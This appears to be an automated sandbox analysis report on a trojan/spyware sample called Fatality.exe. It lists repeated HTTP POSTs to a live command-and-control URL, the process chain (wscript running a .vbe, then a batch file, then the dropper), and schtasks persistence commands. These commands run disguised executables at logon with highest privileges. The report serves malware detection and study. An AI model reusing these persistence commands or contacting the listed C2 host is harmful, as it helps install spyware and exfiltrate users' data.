                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 1820 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 151756 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 1828 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 1840 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 2512 | Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1840Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2512Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 1820Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 373292cm.nyashka.topContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 1840 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 2512 | Expect: 100-continue
                              Source: global traffic | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 2512 | Expect: 100-continue | Connection: Keep-Alive
                              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global traffic | DNS traffic detected: DNS query: 373292cm.nyashka.top
                              Source: unknown | HTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 | Host: 373292cm.nyashka.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://373292cm.nyP
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://373292cm.nyP2
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://373292cm.nyashka.top
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://373292cm.nyashka.top/
                              Source: EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003618000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003673000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, EoNanmDGxPEtougVgAjHLx.exe, 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.enigmaprotector.com/
                              Source: Fatality.exe, 00000000.00000002.2133322697.0000000000982000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://www.enigmaprotector.com/openU
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe | Window created: window name: CLIPBRDWNDCLASS

                              System Summary

                              Source: Fatality.exe | Static PE information: section name:
                              Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Users\user\Desktop\Fatality.exe | Code function: 0_2_04D5685F NtQueryInformationProcess,GetSystemInfo,0_2_04D5685F
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A14AC41_2_00007FFD346A14AC
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A146841_2_00007FFD346A1468
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A0E2641_2_00007FFD346A0E26
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A12D041_2_00007FFD346A12D0
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A02D341_2_00007FFD346A02D3
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A135841_2_00007FFD346A1358
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A131441_2_00007FFD346A1314
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A139C41_2_00007FFD346A139C
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A142441_2_00007FFD346A1424
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346A13E041_2_00007FFD346A13E0
                              Source: C:\Recovery\dllhost.exeCode function: 41_2_00007FFD346C196841_2_00007FFD346C1968
                              Source: C:\Recovery\dllhost.exeCode function: 42_2_00007FFD34670D4C42_2_00007FFD34670D4C
                              Source: C:\Recovery\dllhost.exeCode function: 42_2_00007FFD34670E4342_2_00007FFD34670E43
                              Source: Joe Sandbox View, Dropped File: C:\Bridgemonitor\BridgeInto.exe 6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                              Source: Joe Sandbox View, Dropped File: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exe 6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                              Source: Joe Sandbox View, Dropped File: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe 6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                              Source: C:\Users\user\Desktop\Fatality.exe, Code function: String function: 00986264 appears 73 times
                              Source: Fatality.exe, Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Fatality.exe
                              Source: Fatality.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: BridgeInto.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: WinStore.App.exe.6.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: dllhost.exe.6.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: EoNanmDGxPEtougVgAjHLx.exe.6.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: EoNanmDGxPEtougVgAjHLx.exe0.6.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: EoNanmDGxPEtougVgAjHLx.exe1.6.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Fatality.exe, Static PE information: Section: ZLIB complexity 0.9972848934977578
                              Source: Fatality.exe, Static PE information: Section: ZLIB complexity 0.9947916666666666
                              Source: Fatality.exe, Static PE information: Section: cheat ZLIB complexity 0.9969740316901409
                              Source: classification engine, Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@53/59@1/1
                              Source: C:\Bridgemonitor\BridgeInto.exe, File created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe
                              Source: C:\Bridgemonitor\BridgeInto.exe, File created: C:\Users\user\Desktop\nKZvhtVR.log
                              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5588:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
                              Source: C:\Recovery\dllhost.exe, Mutant created: NULL
                              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-NUz87R2ScA5J4vD9Ssui
                              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
                              Source: C:\Bridgemonitor\BridgeInto.exe, File created: C:\Users\user\AppData\Local\Temp\5qzorvzb
                              Source: C:\Users\user\Desktop\Fatality.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: Fatality.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Bridgemonitor\BridgeInto.exe, WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe, WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Users\user\Desktop\Fatality.exe, File read: C:\Windows\win.ini
                              Source: C:\Users\user\Desktop\Fatality.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: mEhQIJUl58.25.dr, k7wqnbxppA.25.dr, dNXxAgck8g.25.dr, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: Fatality.exe, ReversingLabs: Detection: 78%
                              Source: Fatality.exe, Virustotal: Detection: 84%
                              Source: C:\Users\user\Desktop\Fatality.exe, File read: C:\Users\user\Desktop\Fatality.exe
                              Source: unknown, Process created: C:\Users\user\Desktop\Fatality.exe "C:\Users\user\Desktop\Fatality.exe"
                              Source: unknown, Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                              Source: C:\Users\user\Desktop\Fatality.exe, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe"
                              Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "
                              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Bridgemonitor\BridgeInto.exe "C:\Bridgemonitor/BridgeInto.exe"
                              Source: unknown, Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                              Source: unknown, Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP"
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP"
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                              Source: C:\Bridgemonitor\BridgeInto.exe, Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
